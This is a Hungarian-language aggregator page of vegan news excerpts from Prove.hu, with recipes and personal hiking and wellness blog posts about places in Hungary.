Még kapható a második,
bővített kiadás!
Próbálja ki, biztosan ízleni fog!
Vegán tiramisu kesukrémmel, tojásmentes piskótából
Vegán karácsonyi italok: a legfinomabb chai, forró csoki és alkoholmentes puncs
Komplett vegán karácsonyi menü: ünnepi ételek növényi alapon
Fahéj vagy szerecsendió?
magyar receptek
Dietetikus, pszichológus és sportoló is a Veganuár kihívás elkezdésére biztat
2024. december 13. Prove - a világ vegán szemmel
Hat különböző személy, hat inspiráló történet, és egy kapocs közöttük: a veganizmus fontossága az életükben. Ismerd meg a Veganuár 2025 kiemelt influenszereit, akik arra bátorítják a magyar lakosságot, hogy adjanak egy esélyt a most induló vegán kihívásnak. Egyre nagyobb várakozás övezi a 2025-ben hatodik alkalommal megrendezendő Veganuár kihívást. Számos influenszer is támogatja a kampányt, közülük… The post Dietetikus, pszichológus és sportoló is a Veganuár kihívás elkezdésére biztat appeared first on Prove.hu.
Indul a Veganuár 2025 - Jordán Adél invitál a testi-lelki tisztaság hónapjára
2024. december 10. Prove - a világ vegán szemmel
Jordán Adél színésznővel mutatkozik be a legújabb, immár hatodik Veganuár kampány, amely 2020 januárja óta inspirálja a magyarokat arra, hogy kipróbálják a vegán életmódot januárban és azon túl. A nonprofit, ingyenes mozgalom eddig közel 120 ezer embernek segített az életmódváltásban. Az egészségtudatos étkezés kívül-belül harmóniát és békét teremthet. Ennek az egyik legjobb módja a növényi… The post Indul a Veganuár 2025 - Jordán Adél invitál a testi-lelki tisztaság hónapjára appeared first on Prove.hu.
Jobb híján magában ,,beszél egy magányra ítélt delfin
2024. december 9. Prove - a világ vegán szemmel
Szokatlan módon egyedül él Delle, a palackorrú delfin a Balti-tengerben, ettől függetlenül annyi hangot ad ki, mintha legalább két társa lenne még mellette. A kutatók szerint ez valószínűleg arról árulkodik, hogy hiányzik neki a társaság, egyértelmű magyarázatot azonban egyelőre nem találtak az állat viselkedésére. A palackorrú delfinekről köztudott, hogy társaságkedvelő állatok, közösségekben élnek, amelyek akár… The post Jobb híján magában ,,beszél egy magányra ítélt delfin appeared first on Prove.hu.
,,Szerettem volna látni, mit tudok kihozni a testemből - így érkezett meg hazánkba a vegán sportolókról szóló bestseller könyv
2024. november 30. Prove - a világ vegán szemmel
A Prove ajánlásával jelent meg magyarul a The New York Times egyik idei bestsellere, A vegán sportoló. A hiánypótló kötet tudományos bizonyítékokkal támasztja alá azt a tényt, hogy a sportolói csúcsteljesítmények vegánok számára is elérhetőek. A könyvben bemutatott kutatások alapján a tudatosan kialakított növényi étrend ugyanis gyorsabb regenerálódási időt, hatékony sérülésmegelőzést és pihentetőbb alvást tesz… The post ,,Szerettem volna látni, mit tudok kihozni a testemből - így érkezett meg hazánkba a vegán sportolókról szóló bestseller könyv appeared first on Prove.hu.
Gombás receptek: 9 varázslatos fogás a hidegebb napokra
2024. november 24. Prove - a világ vegán szemmel
A gomba az egyik legsokoldalúbb alapanyag, amit a konyhában felhasználhatsz: könnyen variálható, tele van ízzel, és szinte minden étrendbe beilleszthető. Ebben a válogatásban összegyűjtöttünk kilenc izgalmas gombás receptet, amelyek garantáltan a legjobbat hozzák ki ebből a csodás alapanyagból. Az alábbi receptek között megtalálod tradicionális magyar ételek vegán változatait, mediterrán ízvilágot idéző fogásokat vagy épp különleges… The post Gombás receptek: 9 varázslatos fogás a hidegebb napokra appeared first on Prove.hu.
Az osztrák szaporító csöngei telepe még csak a pokol kapuja lehet
2024. november 16. Prove - a világ vegán szemmel
A jelenleg szökésben lévő szaporító, Brigitta Müllner több magyarországi ingatlanjában is lehetnek még segítségre szoruló állatok. A csöngei telepen a hatóságok és a civil állatvédők összefogása nyomán pokoli körülmények közül mentettek ki kutyákat, kecskéket, birkákat, lovakat és szárnyasokat. Schneider Kinga, a Noé Állatotthon Alapítvány munkatársa szerint egyáltalán nem számít kuriózumnak, hogy egy külföldi szaporító hazai… The post Az osztrák szaporító csöngei telepe még csak a pokol kapuja lehet appeared first on Prove.hu.
Egészség
2024. november 12. Élj harmóniában
Ma olvastam egy cikket arról, hogy a magyar emberek évente 600-800 milliárd forintot hagynak magánrendelőkben. A cikk kitért a páciensek összetételére is, miszerint egyre több a fiatal. Az emberek sokat járnak orvoshoz és hihetetlen pénzeket költenek el vizsgálatokra, orvosi beavatkozásokra, gyógyszerekre. Sajnos arról nem olvastam még, hogy prevencióra az emberek mennyi időt és pénz áldoznak. Hihetetlen mennyiségű ételfutárt látok az utcákon, a boltok tele vannak egészségtelen, állott, félkész ételekkel. . A bioélelmiszerek nem igazán fogynak, az emberek nem igazán főznek frissen otthon és sajnos a magyar lakosságnak még mindig fontosabb az autóba tankolt benzin minősége, mint az élelmiszer minősége amit elfogyaszt. A fitnesstermekben, jógastúdiókban, uszodákban, etc . kevesebben fordulnak meg mint évekkel ezelőtt. A Covid után nagyon sok fitnesz- és jógaterem kiürült és azóta sem tértek vissza igazán az emberek. Akkor beszélgettem pár barátommal, és azt mondtam, hogy néhány év múlva az egézségügyben lesz tömeges létszám, mert aki most elkezdi elhanyagolni fizikális és mentális jóllétét, néhány év múlva, sajnos szembesülhet a következményekkel. A személyiségfejlesztés, gondolkodás változtatás, életmódváltás, tudatos táplálkozás még mindig nem kap elég fókuszt a lakosság jelentős részénél. Az egészség magánügy, ha valami gond van az egészségemmel, ahhoz az esetek legnagyobb százalékában (vannak kivételek), de a legtöbb esetben én járultam hozzá - pihenés, stresszkezelés, táplálkozás, emberi kapcsolatok, testmozgás, gondolkodás, légzés, etc. Úgy gondolom, ha az emberek, a magánegészségügyben elköltött összeg töredékét és némi időt megelőzésre fordítanának, sokkal kevesebb betegség lenne. Elmondom mindig, hogy addig változtass, amíg magadtól teheted meg és nem az élet kényszerít rá. Sajnos a legtöbben már csak akkor változtatnak, ha valami komolyabb betegség megjelenik. Érdemes tudatosan életmódot, táplálkozást, gondolkodást változtatni, megfelelő testmozgást végezni, mert hosszú távon ez a legjobb befektetés. kiegészítés... Minden aminek időt, pénzt, energiát szentelsz virágozni fog az életedben. Aki a karrierjének szentel sok energiát az fog virágozni, Próbálj arányosan időt és teret csinálni az életedben a pénzkeresésen, karrieren kívül az emberi kapcsoaltoknak és az egészségednek is. Szánj több időt, pénzt, energiát az egészségmegőrzésre, öngondoskodásra. szeretettel: Kati Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Ha szeretnél az ájurvédikus életmódról, egyéni testalkatodról többet tudni, szeretettel várlak Egészségmegőrzés mesterfokon - ájurvéda életmódtanfolyamomra. https://www.eljharmoniaban.hu/ajurveda-eletmodtanfolyam Ha személyre szabott megoldást szeretnél a problémáidra, jó lenne ha egy tapasztalt szakember lépésről, lépésre kísérne a változás útján egyéni igényeidnek megfelelően, szeretettel várlak egyéni konzultációkra, életmódtanácsadásra. https://www.eljharmoniaban.hu/eletmodtanacsadas
Malacboncolással szórakoztatta nézőit a Séfek Séfe, a MAVEG is felszólalt ellene
2024. október 25. Prove - a világ vegán szemmel
A Séfek Séfe gasztroreality nem pusztán etikai határokat lépett át, amikor malacok boncolását adták ki feladatként a résztvevőknek - állítja a Magyar Vegán Egyesület. A műsor készítői és a mögöttük álló csatorna problematikus társadalmi mintákra is ráerősített: azt üzenték a nézőiknek, hogy az ilyen gyakorlatok elfogadhatóak és normálisak. Nem pusztán arról van szó, hogy az… The post Malacboncolással szórakoztatta nézőit a Séfek Séfe, a MAVEG is felszólalt ellene appeared first on Prove.hu.
Fa tetején ragadt kutyát is kellett menteni a Helene hurrikán pusztítása után
2024. október 11. Prove - a világ vegán szemmel
Miután a Helene hurrikán végigsöpört az Egyesült Államok délkeleti felén, az állatmentőknek is bőven akadt dolguk. Bajba jutott állatokon kellett segíteni, mégpedig változatos módokon: evakuálással, mentéssel, ingyenes szolgáltatást biztosító állatorvosi furgonnal. A magyarországi állatvédők összefogtak szeptemberben annak érdekében, hogy minél hatékonyabb legyen az árvízi állatmentés. Most pedig az Egyesült Államokban is együttes erővel léptek fel… The post Fa tetején ragadt kutyát is kellett menteni a Helene hurrikán pusztítása után appeared first on Prove.hu.
Mesebeli, varázslatos sziklaformációk
2024. szeptember 27. Élj harmóniában
A mai napra egy börzsönyi útvonalat terveztem, de reggel kiderült a Börzsönyben esni fog, így kezdtem a körbenézést, hol nem fog esni:) Majd ennek megfelelően terveztem a túraútvonalat. Olyan helyet választottam, ahol a felhős időjárásban amikor majd előbújik a nap sütkérezhetünk kicsit:) Amikor nincs nyár, szeretem azokat a helyeket, ahol nyíltabb a terep, így lehet élvezni az éltető őszi napsugarakat. Végül, ma a Budai-hegységben kalandoztunk. A Normafánál kezdtünk és a Budaörsi kopárokat jártunk be, ami egy igazán különleges hely... minimális növényzet, hihetetlen panoráma, izgalmas formájú kopár hegyek.... és szinte minden irányba messze ellátni.... bármerre elláthatunk és mehetünk, nincs korlátozó növényzet A kilátásban az autópályák, a bevásárlóközpontok nyüzsgése mellett csodásan megmutatkoznak a háttérben a környező hegyek, völgyek. Látható a kopárok hegyei és a háttérben a Velencei hegység, a Vértes, a Gerecse és még a Duna is megcsillan egy pici részen. Milyen más az ember alkotta táj és a természet alkotta táj... Fontos a természettel harmóniában, együttműködve élni és életteret nyerni és nem a természetet leigázni... Érdekes volt látni, hogy a Vitorlázórepülő-emlékmű eltűnt... hűlt helye... gondolom nem elege lett és elrepült:) Lehet elvitték felújjítani vagy megsérült... Minden esetre az élményből számunkra nem vont le semmit a hiánya:) A Kopárok úgy általában sem foghatóak semmihez, de a Sorrento sziklák a fenyvesek között megbújva, a szépséges panorámájával, számomra amolyan kis meseszerű, különleges hely - láttam már felbukkanni Magyarországon forgatott filmben is. Engem egyáltalán nem a mediterrán, olasz kisvárosra emlékeztet, sokkal inkább egy mesés, elvarázsolt helyre... csodaszklassz. Mai útvonalunk: Csillebérc KFKI előtti parkoló- Frank-hegy - Farkas-hegy - Szállás-hegy - Szekrényes-hegy - Sorrento-sziklák - Sinka Lajos emléktábla - egykori hangár - Csillebérc Csodás túrákat kívánok:) szeretettel Kati
Elutasítják az oltásokat, nem járnak orvoshoz - így mutatta be a vegánokat 1987-ben a magyar sajtó
2024. szeptember 6. Prove - a világ vegán szemmel
A ,,veganizmus kifejezést 1944-ben alkotta meg a brit Donald és Dorothy Watson, akiknek nevéhez a Vegan Society megalapítása is fűződik. Magyarországon ezt a kifejezést, illetve a ,,vegán szót először azonban csak évtizedekkel később említették írásban. ,,Mikor és milyen kontextusban használták először Magyarországon írásban a >>veganizmus>vegán
Idilli erdők, hűs patak, tiszta vízű forrás, mesés panorma...
2024. augusztus 24. Élj harmóniában
Többen jeleztétek, hogy szeretnétek, hogy írjak picit többet az útvonalakról - merre is készülnek a képek Így az elmúlt néhány bejegyzésnél ebbe bele is vágtam. Remélem sokakat tudunk inspirálni arra, hogy Magyarország csodás helyeit felfedezzétek . A tegnapi Szent Mihály hegy után, ma újra a Pilisben és a Visegrádi hegységben . A mai túra tervezésnél a Pilis számomra néhány kedves pontját szerettük volna bejárni - van olyan kedvenc helyem, ahol idén még nem is voltunk. Illetve imádom, ha olyan helyekre látunk rá, hol az elmúlt néhány túra alkalmával már jártunk. Útvonal: Dobogókő - Tos-sziklák - Szakó-nyereg - Hoffmann kunyhó - Felső Ecset-hegy - Fehér-szikla - Hirsch-orom - Miklós Deák völgyi tavak - Pilismarót Amolyan obeliszk túrának is nevezhetném a mai utunkat, mert jónéhány ponton obeliszkkel is megemlékeztek a hely névadójáról. A kiindulási pont Dobogókő, nem a kedvencem, mert autóval is fel lehet járni, tele van elektromos mindenféle adó tornyokkal és sokan vannak és nagyon erős néha az ételszag:) de központi helyen van és csodás a panorámája a Dunakanyarra, Börzsönyre, Pilis hegyeire, a Naszályra és a Cserhát és a Mátra vonulatai is láthatóak tiszta időben - ezért sokszor érintjük a túrák során. Azaz igazi nyugalom, béke és csoda, ahogy lehet kapcsolódni a természettel itt nincs annyira jelen, mint más hegycsúcsokon, de a látvány egyedülálló:). Egyébként nagyon jónak tartom, hogy azok akik nem tudják az erdőket komolyabban járni - koruk vagy fizikai állapotuk miatt - ide feljöhetnek busszal vagy autóval és szét tudnak nézni. Jó látni az időseket, akik busszal feljönnek barátok, párok és itt sétálgatnak a friss levegőn és beszélgetnek:) Ez az útvonal a kezdeti és végpont között tartalmazott egy kis kitérőt is, mert imádom a Felső Ecset-hegyet és a Fehér-sziklát. A Fehér-sziklánál vacsoráztunk... gyönyörű a kilátás Balról Dobogókő széle, majd a Fekete kő szikláit lehet látni (itt nagyon sokszor üldögéltünk vagy éppen ebédeltünk már életünkben:) lent a völgyben Pilisszentlélek házai látszanak - itt is tartottunkjónéhány jóga elvonulást már:) Szemben a Fekete-hegy és a háttérben a Gerecse. A Hirsch-orom is csodás kilátást nyújt Dobogokőre és a másik oldalon még a Duna szalagjának egy darabja is megmutatja magát. A túra idilli erdőkön vezet keresztül, az erdőből folyamatosan a fák között kivillan mindig valami szép panoráma. Útközben a Hoffmann forrásból lehet a kulacsokat utántölteni és Hoffmann vadászháznál a patak miatt lehet kicsit hűsölni is. Az útvonal viszonylag könnyen járható, nehézség csak a Hirsch-oromról Pilismarót irányába lefelé vezető útvonalon van, illetve a Fehér-sziklánál érdemes azért odafigyelni hová lépünk:) Jó túrázást kívánok szeretettel Kati
Búbánatvölgy
2024. augusztus 17. Élj harmóniában
Búbánatvölgy... jónéhány jóga elvonulást tartottunk itt, amolyan szívemnek kedves hely:) Csodaszép hegyekkel körbeölelt békés környezet. Ha valaki nyaralni, pihenni szeretne vagy csak piknikezni jó szívvel ajánlom. Mai túránk későn indult, mert Purusa délelőtt még tartott egy magánórát. Mire kiértünk tömegközlekedéssel Búbánatvölgybe 14 óra volt. Első célpont, a Hideglelős kereszt, ahol csodaszép a panoráma... nem csak a Duna szalagját, de a kis szigeteket is jól láthatjuk, és Szlovákiára és a Börzsönyre is szép a kilátás. Panorámás utunk folytatódott a hegyeken át (Sas-hegy, Vasarc, Őrhegy és Dobogó-hegy ) kimentünk a Róka sziklához vacsorázni:) A vacsora után, a Szilva-rét irányába haladtunk tovább és innen mentünk a Fári-kúthoz, majd a Majális forráshoz - aminek nagyon jó vize van. Minden kiürült vizespalackunkat meg is töltöttük friss forrásvízzel. Kb 15 éve itthon is mindig forrásvizet iszunk és azzal is főzünk. Szinte nem tudom már elképzelni, hogy akárcsak egy tésztát csapvízben főzzek ki. A túra vége Búbánatvölgy, már naplementében... A Kerek tó felett magasodó hegy tetejénél pedig odaérkezés után néhány perccel éppen kibukkant, feljött a Hold. Az egész útvonal tele van csodaszép panorámás pontokkal, fák közötti leselkedős kilátásokkal, tágas rétekkel és szerencsére már érik a szeder is: Még két lábon álló kecskét is láttunk Fotó mellékelve:) Bár még augusztus van, de az őszülés már megkezdődött... a sok szél, a nagy meleg és szárazság eredményeképpen az erdő sok helyen már sárgaszőnyeget terített elénk és a messzi látképeken is láttuk, hogy a hegyek sok helyen már kezdenek színesbe öltözni a következő szezon divatjának megfelelően.. Milyen gyönyörű Magyarország A Dunakanyar különösen csodálatos vidék, mert nem csak természetileg lenyűgöző, de történelmi, spirituális, kultúrális programokat is bőven kínál.
Darázs... hogyan is érdemes róla gondolkodni :)
2024. augusztus 16. Élj harmóniában
Hétvégén unokahúgomat vittük túrázni, de akárhányszor darazsat látott elkezdett jajveszékeli, ugrálni, hesegetni... ez inspirált az alábbi bejegyzés megírására, mert nagyon sokszor még felnőtt embereknél is látom ezt a reakciót - hesegetés, csapkodás. Sokan félnek a darazsaktól, mert a csípésük (szúrásuk) nagyon fájdalmas tud lenni és méreganyaguknak köszönhetően a hatások hosszasan elhúzódhatnak. A legtöbb darázsfaj nagyon hasznos (kártevőket pusztítanak el) és lévén nem emberekkel táplálkoznak, ezért alapjáraton nem bántják az embereket. Kedves, barátságos élőlények és általában nem hordákba verődve támadják az embereket, ahogy azt sokan elképzelik. Néhány darázsfaj van Magyarországon, ami valóban veszélyes lehet. Alapjáraton egy darázs csak körbenéz, megszagolgat téged, az ételedet, az italodat és ha nem érzékel támadást a részedről akkor tovább is fog menni. Jobban izgatja egy légy vagy valamiféle rovar, vagy éppen egy kis nektár vagy virágpor, minthogy Veled foglalkozzon. Ha lehet ne hagyj elől ételmaradékot, ne felejtsd nyitva a kuka tetejét, mert az vonzó számukra. Ha van vízgyűjtőd vagy medencéd, akkor fedd le. Amikor egy darázs a közeledbe kerül, ne aggódj, ne hesegess, ne csapkodj, ne akard megölni, ne kezdj futni... a fészkét se akard elpusztítani. A fenti esetekben a darázs mivel fenyegetve érzi magát, valóban agresszívé válhat és támadhat, sőt akár hívja segítségül a társait is. Mindig maradj nyugodt és próbálj mozdulatlan lenni. Hagyd, hogy megszaglásson, megnézzen magának és távozzon:) A darazsak akkor jelentenek vesélyt, ha a szúrásuk allergiás reakciót vált ki valakinél vagy ha a szúrás szájüreg területét érinti. Ha úgy érzed valóban fenáll a komoly veszély, akkor fordulj orvoshoz. De újra leírom, csak akkor támadnak, ha veszélyben érzik az életüket vagy a fészküket. A darazsak fontosak és hasznosak, ne tekints rájuk úgy, mint halálos ellenségekre vagy alapjáraton gonosztevőkre. Mivel kifejezetten hasznosak, ha nincs a fészek zavaró helyen azt is inkább hagyd békén. Ha el szeretnéd a fészkét pusztítani, akkor kérj segítséget szakértőtől. Darázscsípés mentes életet kívánok szeretettel Kati
Bőven van még hátra a dinnyeszezonból, ezért érdemes kihasználni
2024. augusztus 8. Prove - a világ vegán szemmel
Egyre nagyobb a kereslet Magyarországon a hazai görögdinnyére, ez pedig egészségügyi szempontból is előnyös lehet. A gyümölcsben rejlő tápanyagokkal és vitaminokkal még szeptember végéig feltöltheted a szervezeted, profitálva a görögdinnye szívbetegségek megelőzésére is alkalmas tulajdonságaiból. Ha te is azok közé tartozol, akik az izzasztó kánikulában sokszor nem is ennének mást egész nap, csak görögdinnyét, van… The post Bőven van még hátra a dinnyeszezonból, ezért érdemes kihasználni appeared first on Prove.hu.
Éreznek fájdalmat a növények?
2024. augusztus 4. Prove - a világ vegán szemmel
Nem sok kétely merül fel azzal kapcsolatban a tudósok és a laikusok körében sem, szenvedhetnek-e, képesek-e ilyen érzésekre az állatok. Az már megosztóbb téma, hogy a növények éreznek-e fájdalmat. Ha vegán életmódot követsz, nyilván tudod, hogy közel minden új ismeretséghez és ismerkedéshez társul egy bizonyos kérdés. Ez az a kérdés, amely nagy valószínűséggel merül fel… The post Éreznek fájdalmat a növények? appeared first on Prove.hu.
Vivike előszőr volt 756 méteren...
2024. július 7. Élj harmóniában
Amikor a nagynéni erdő és panoráma imádó... Vivike előszőr volt 756 méteren... felment és le is jött :))) Mindig csodálatos bevezetni valakit a tudatos természetjárásba:) ... megmutatni milyen jelen lenni, minden érzékszervünkkel tapasztalni azt, ami körbevesz és tudatosítani... töltekezni energiával (pránával), élményekkel, szépséggel, illatokkal, formákkal, hangokkal... Elmagyarázni, hogy a "fujj bogár", itt lakik és nem szabad bántani, hanem hálásnak kell lenni, hogy itt lehetünk... hiszen ez az ő lakhelye, élőhelye és momentán mi tolakodtunk be az ő kertjébe:) A természetet csodálni kell, a természettel együtt kell létezni és nem kihasználni vagy a saját magunk által elképzeltre alakítani. Csodás nyári napokat:) szeretttel: Kati
Kenyérlángos, más néven töki pompos vagy langalló
2024. június 28. Prove - a világ vegán szemmel
Ami az olaszoknál a pizza, az a magyaroknál a krumplis tésztából készült kenyérlángos, más néven langalló vagy töki pompos. Emellett paradicsomszósz helyett a magyar konyha elmaradhatatlan összetevője kerül rá alapként: sok-sok fokhagymával ízesített tejföl. Íme a vegán változat. A kenyérlángosra hagyományosan olyan összetevők kerültek, amelyek minden kamrában megtalálhatók voltak. Ezért a leggyakoribb és egyben leginkább… The post Kenyérlángos, más néven töki pompos vagy langalló appeared first on Prove.hu.
5 főzés nélküli étel meleg napokra: ötletek reggelire, ebédre és vacsorára
2024. június 25. Prove - a világ vegán szemmel
Nyáron a legutolsó dolog, amihez az embernek kedve van, az a forró tűzhely feletti ácsorgás. Ilyenkor jól jönnek a főzés nélküli ételek - ehhez hoztunk most öt receptet, amik között találsz reggelire, ebédre és vacsorára is elkészíthető fogásokat. A magyar konyhának megvannak a trükkjei a meleg napokra. Ilyenkor vesszük elő a nagymama jól bevált hideg… The post 5 főzés nélküli étel meleg napokra: ötletek reggelire, ebédre és vacsorára appeared first on Prove.hu.
Naszály... csodálatos panoráma
2024. június 16. Élj harmóniában
Naszály... lélegzetelállító panoráma, csodálatos növényekkel és állatvilággal - a legtöbben menekülőre fogták, mire előlkerült a telefon A szem, a szív, az elme és a lélek sem tud betelni a csodákkal Mindig megállapítom, hogy hihetetlenül gyönyörű Magyarország és nagyon boldog vagyok, hogy itt élhetek és karnyújtásnyira ilyen csodás helyeket találni
Ovádi Péter: A magyar haszonállat-védelem első osztályú
2024. május 10. Prove - a világ vegán szemmel
A magyar állatvédelem kulcsfigurája ma - a civil aktivisták mellett - Ovádi Péter állatvédelemért felelős kormánybiztos. Az eddigi intézkedésekről, a tervezett jövőbeli lépésekről, a cirkuszi állatokról és a haszonállatokat érintő jóléti kérdésekről is beszélgettünk vele. Prove-interjú. Ovádi Péter 2018-ban lett Veszprém vármegye 1. számú országgyűlési egyéni választókerületének képviselője. Már ekkor is programjának központi eleme volt… The post Ovádi Péter: A magyar haszonállat-védelem első osztályú appeared first on Prove.hu.
Dupla epres csokoládés muffin (vegetáriánus, vegán)
2024. április 23. Zizi kalandjai
Ha létezik dupla csokis muffin, akkor létezik dupla epres muffin is. Azért dupla epres, mert került bele friss (magyar) eper és lioflilizált, azaz fagyasztva szárított eper is. A duplázás miatt ez egy nagyon finom, igazán epres muffin. Az eper frissítő savanykás ízét ellensúlyozza az étcsokoládé. A banánok pedig tojások helyett kerültek bele, segítik a muffin természetes édesítését és ettől… Source
Háborognak az állattartók, amiért egy mesekönyvben vegán lett a róka
2024. március 31. Prove - a világ vegán szemmel
Német klasszikust öltöztettek új köntösbe, ebben a nyúl legjobb barátja egy vegán mesehős szerepében tündöklő róka, a főgonoszok pedig a gazdák. Ahogy arra számítani lehetett, a gazdák nincsenek elragadtatva a modernizált történettől. A magyar könyvpiac finoman szólva sem bővelkedik vegán mesekönyvekben. Egy-két példa akad ugyan, de a legtöbb esetben a vegán szülő az elveivel gyökeresen ellentétes… The post Háborognak az állattartók, amiért egy mesekönyvben vegán lett a róka appeared first on Prove.hu.
A Gibraltár melletti vegán étkezdéjében várja vendégeit a magyar állatmentő
2024. március 20. Prove - a világ vegán szemmel
A La Línea Verde vegán étkezde tulajdonosa, Tetézi Györgyi rendszeresen ajánlja fel a veganuározóknak családja vendégszobáját a Gibraltárhoz közeli otthonukban. De nem csak a nyaralni vágyóknak segít, az állatmentés is ,,gyári beállítás nála. A vegán életmódról, a spanyolországi tapasztalatairól és az állatvédelemről beszélgettünk vele. A Veganuár-sikertörténetekről szóló írásunkban mutattuk be Karai Laurát, akinek nagy változást… The post A Gibraltár melletti vegán étkezdéjében várja vendégeit a magyar állatmentő appeared first on Prove.hu.
Nesztek, vegánok: áremelést tervez a növényi burgerpogácsákat gyártó Beyond Meat
Az áremelés a magyar piacra is kihathat, mivel a cég termékeit forgalmazza a legtöbb hazai lánc is.
Elhunyt Garai Attila, a magyar vegán mozgalom széplelkű bölcse
2024. február 27. Prove - a világ vegán szemmel
Meghatározó egyéniségét veszítette el a magyar vegán közösség Garai Attila, a Magyar Vegán Egyesület (MAVEG) egyik alapító tagjának személyében. Az Orvostovábbképző Szemle biológus végzettségű, ám igazi hivatását az angol és német nyelvű könyvek magyarra fordításában megtaláló szerkesztője életének 68. évében, súlyos betegség következtében hunyt el. A személyes tragédiái által is formált empatikus személyisége vezette Garai… The post Elhunyt Garai Attila, a magyar vegán mozgalom széplelkű bölcse appeared first on Prove.hu.
Magyaros szójafasírt: vegán változatban is hozza a hagyományos ízeket
2024. február 15. Prove - a világ vegán szemmel
Azok a legnépszerűbb ételek, amelyek kellő otthonosságot és komfortot varázsolnak a hétköznapjainkba akkor is, ha éppen semmi kedvünk kimozdulni otthonról. Ezért ma a magyaros szójafasírt receptjét mutatjuk meg. A szójafasírt ízesítésekor a hagyományos fűszerezésre törekedtünk, hogy az otthon melegét és a tradicionális ízeket idézzük meg. Tökéletes választás egy családi ebéd vagy vacsora alkalmával például ezzel… The post Magyaros szójafasírt: vegán változatban is hozza a hagyományos ízeket appeared first on Prove.hu.
Betiltaná a szintetikus húsokat Magyarország: Nagy István így védené a hagyományos vidéki életmódot
2024. január 25. Prove - a világ vegán szemmel
Az állatok levágásától mentes, szintetikus húsok betiltásáról és a vidéki életmód fontosságáról egyeztetett Nagy István agrárminiszter Ettore Prandinivel, a Coldiretti olasz termelői szervezet elnökével. Miután Olaszország a közelmúltban betiltotta a szintetikus húsok gyártását és forgalmazását, ezt a lépést a hazai Agrárminisztérium is fontolóra vette a ,,hagyományos vidéki értékek védelme érdekében. Az Agrárminisztérium közleményében úgy fogalmazott:… The post Betiltaná a szintetikus húsokat Magyarország: Nagy István így védené a hagyományos vidéki életmódot appeared first on Prove.hu.
6 házias recept növényi alapon: így dobd fel a Veganuárt
2024. január 14. Prove - a világ vegán szemmel
Január közepe van, ami azt jelenti, elérkeztünk a Veganuár kihívás félidejéhez. Ha már nincs ötleted, mit főzz, segítünk: íme pár házias recept, melyek azok körében is sikeresek lesznek, akik a megszokott, magyaros ízvilágot kedvelik. A magyar konyhában rengeteg olyan házias recept és étel létezik, ami ,,véletlenül vegán. Gondoljunk csak a krumplis vagy a káposztás tésztára,… The post 6 házias recept növényi alapon: így dobd fel a Veganuárt appeared first on Prove.hu.
Karácsonyi asztalunk dísze: a párolt lilakáposzta
A párolt lilakáposzta egy olyan klasszikus fogás, ami nem hiányozhat egy gazdagon terített karácsonyi asztalról. A lilakáposzta, amely a káposztafélék családjába tartozik, hosszú utat tett meg, mire eljutott a karácsonyi asztalunkra. Európában már évszázadok óta termesztik, és számos országban része a hagyományos konyhának. Magyarországon is kedvelt zöldség, különösen az ünnepi időszakban. A lilakáposzta nemcsak finom, hanem egészséges is. Gazdag C-vitaminban és rostban, továbbá antioxidáns tulajdonságokkal is rendelkezik, ami hozzájárul az egészséges immunrendszer fenntartásához. A benne lévő antociánok, amelyek a káposzta lilás színét adják, segítenek csökkenteni a gyulladásokat a szervezetben. A párolt lilakáposzta tökéletes köret vegetáriánus fogások mellé is. Mély színe és íze remekül kiegészíti az ünnepi ételek palettáját. Ráadásul a lilakáposzta párolásával megőrizzük a zöldség tápanyagait és ízét, így egészséges és ízletes köretet kapunk. Hozzávalók: egy közepes fej lilakáposzta 1 tk só 3 ek olaj 2 ek cukor 2 ek almaecet 1 kk őrölt fűszerkömény 1 kk só A káposztát negyedekre vágjuk, egyenként legyaluljuk, majd a legyalult káposztát besózzuk a teáskanálnyi sóval. Fél órán át állni hagyjuk. Ha letelt, egy lábosban felmelegítjük az olajat, beletesszük a káposztát, lefedjük és a lángot kicsire húzzuk. Időnként megkeverve addig pároljuk, amíg a káposzta megpuhul. Ekkor hozzáadjuk a cukrot, az ecetet, a fűszerköményt és a sót. Elkeverjük és 3-4 percig tovább pároljuk.
Veszteséges, mégis a hús- és tejipar kapja a legtöbb magyar agrártámogatást
2023. december 22. Prove - a világ vegán szemmel
A hazai hús- és tejipar évek óta erősen veszteséges, az agrártámogatások jelentős része ettől függetlenül az állatipar szereplőit pénzeli. Ez pedig - jelen állás szerint - a közeljövőben nem is változik. Az Agrárminisztérium ugyanis arról tájékoztatta lapunkat, hogy egyelőre nem tervezik a növényi ágazatok felé terelni az állattenyésztőket. Közel 30 milliárd forint nemzetgazdasági veszteséget eredményezett… The post Veszteséges, mégis a hús- és tejipar kapja a legtöbb magyar agrártámogatást appeared first on Prove.hu.
Vágott vagy műfenyő - melyik az igazán környezetbarát karácsonyfa?
2023. december 15. Prove - a világ vegán szemmel
Évek óta rendre élesedik a vita decemberben azzal kapcsolatban, milyen is a környezetbarát karácsonyfa. Éppen ezért most környezetmérnök segítségével jártunk utána a kérdésnek, az ő szakértelme mellett ütköztettük a vágott, illetve a műfenyő mellett szóló érveket és ellenérveket. Ma már gyakorlatilag kötelező elemei az adventi készülődésnek a karácsonyfával kapcsolatos összecsapások is. Mióta Magyarországon is egyre… The post Vágott vagy műfenyő - melyik az igazán környezetbarát karácsonyfa? appeared first on Prove.hu.
Green Wave Mag - ajándékozzatok egészséget karácsonyra!
Biztosan emlékeztek, hogy minden évszakban igyekszem 1-1 magyar vállalkozást bemutatni, amely olyan termékeket gyárt vagy termel és ugyanakkor forgalmaz is, amely méltó arra, hogy részletesebben bemutassák. Különösen közel állnak a szívemhez a magyar családi vállalkozások. Most a Green Wave Mag nevű, héj nélküli tökmagokat és azzal kapcsolatos termékeket (tökmagolaj, tökmagliszt) termelő és feldolgozó vállalkozást szeretném […]
A növényi alapú élelmiszerek mellett kampányol a Magyar Dietetikusok Országos Szövetsége
2023. november 16. Prove - a világ vegán szemmel
Immár a Magyar Dietetikusok Országos Szövetsége is több növényi termék bevitelét, az állati élelmiszerek arányának csökkentését ajánlja. A magyar konyhákban még mindig túl nagy szerepet játszanak az állati eredetű ételek. A növényi eredetű élelmiszerek fontosságára hívta fel a figyelmet a napokban közzétett Facebook-posztjában a Magyar Dietetikusok Országos Szövetsége. Ajánlásuk szerint a napi étrend legalább háromnegyed… The post A növényi alapú élelmiszerek mellett kampányol a Magyar Dietetikusok Országos Szövetsége appeared first on Prove.hu.
November 15-én jelenik meg Greta Thunberg klímakönyve magyar nyelven
2023. november 9. Prove - a világ vegán szemmel
